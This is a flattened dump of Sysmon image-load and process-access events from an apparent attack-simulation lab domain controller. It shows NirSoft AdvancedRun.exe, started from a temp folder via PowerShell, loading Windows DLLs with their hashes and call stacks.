APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.751{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 
(rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.735{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.688{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.688{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 
10341000x80000000000000003910783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.798{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003910782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.798{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003910781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:52:29.782{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003910762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.345{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.345{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.329{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.298{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.298{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003910638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.282{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.282{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.282{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:52:29.267{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.267{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.267{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.251{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 
(rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.251{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.251{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.235{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003910360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.235{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.219{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.219{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910303Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:52:29.219{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.204{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.188{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.173{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.188{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.157{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.157{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003910159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.157{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.188{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.173{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.173{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 
(rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.094{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003910121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.094{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003910117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.063{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 
10341000x80000000000000003910116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.033{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows
